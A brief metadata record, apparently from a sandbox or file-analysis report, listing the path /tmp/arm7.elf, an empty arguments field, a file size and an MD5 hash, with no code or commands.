                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1